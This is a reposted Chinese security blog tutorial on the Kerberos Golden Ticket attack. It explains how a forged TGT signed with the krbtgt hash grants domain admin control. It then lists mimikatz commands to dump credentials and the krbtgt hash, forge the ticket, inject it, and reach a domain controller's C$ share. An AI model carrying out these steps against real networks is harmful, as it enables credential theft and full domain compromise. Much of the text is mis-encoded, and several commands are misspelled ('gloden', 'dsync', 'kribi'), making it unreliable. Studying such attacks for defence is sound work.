黄金票据(Golden Ticket)的原理与实践
0、黃金票據(jù)是什么?
在與認(rèn)證過程中,經(jīng)過client與AS的通信會(huì)得到TGT,帶著TGT想TGS請(qǐng)求,得到票據(jù)ticket,用這個(gè)ticket可以來訪問應(yīng)用服務(wù)器。如果這段有什么疑問,歡迎參考Kerberos認(rèn)證協(xié)議分析。而這個(gè)黃金票據(jù)就是自己生成的TGT,在生成TGT的過程中,user、domain、timestamp、還有權(quán)限等信息會(huì)經(jīng)過krbtgt(該賬號(hào)不自動(dòng)更新)賬戶hash的加密,所以獲取到用戶、域、SID、krbtgt的hash值就可以生成黃金票據(jù)(一般拿到krbtgt需要域管權(quán)限,生成的票據(jù)當(dāng)然也是域管賬號(hào)的,這樣就控了整個(gè)域,而且有了金票據(jù),免除了as驗(yàn)證username、password的階段,所以也不擔(dān)心域管密碼修改)。
1、名詞解釋
1.1 winlogon.exe
接受Username和Password、Domain信息,傳遞給lsass.exe。
1.2 lsass.exe
lsass.exe經(jīng)過kerberos機(jī)制處理Username和Password后與SAM(賬號(hào)數(shù)據(jù)庫(kù))進(jìn)行比對(duì)驗(yàn)證,返回登錄失敗的結(jié)果。
1.3 SAM數(shù)據(jù)庫(kù)
存儲(chǔ)賬號(hào)密碼Hash值的數(shù)據(jù)庫(kù)。
1.4 NetLogon
域認(rèn)證的加密信道(安全信道sChannel)。
2、如何生成黃金票據(jù)
2.1 生成黃金票據(jù)需要的信息
2.1.1 windows域的名稱
PS C:\Users\Administrastor> systeminfo2.1.2 krbtgt和賬號(hào)信息簇
mimikatz# sekurlsa::kerberos mimikatz# sekurlsa::ticket /export mimikatz# sekurlsa::logonpassword mimikatz# lsadump::dsync /domain:xxx.xxx.xxx /user:krbtgt mimikatz# lsadump::lsa /patch -> sid+ntlm2.2 生成黃金票據(jù)
# 使用krbtgt的hash值: mimikatz# kerberos::gloden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx krbtgt:ntlm-hashvlaue /ticket:test.kribi# 使用krbtgt的aes256值: mimikatz# kerberos::gloden /domain:xxx.xxx /sid:xxxxxxxxxxx /aes256:xxxxxxxx /user:Administrator /ticket:test.kribi3 黃金票據(jù)的使用
# 導(dǎo)入票據(jù) mimikatz::ptt test.kribi#檢驗(yàn)緩存票據(jù) PS C:\Users\Administrastor> klist #利用票據(jù)訪問 PS C:\Users\Administrastor> net use \\xx.domain-name dir \\xx.domain-name\c$
轉(zhuǎn)載于:https://www.cnblogs.com/KevinGeorge/p/9337747.html
總結(jié)
以上是生活随笔為你收集整理的黄金票据(Golden Ticket)的原理与实践的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Java学习正嗨Day2!
- 下一篇: 编译原理概述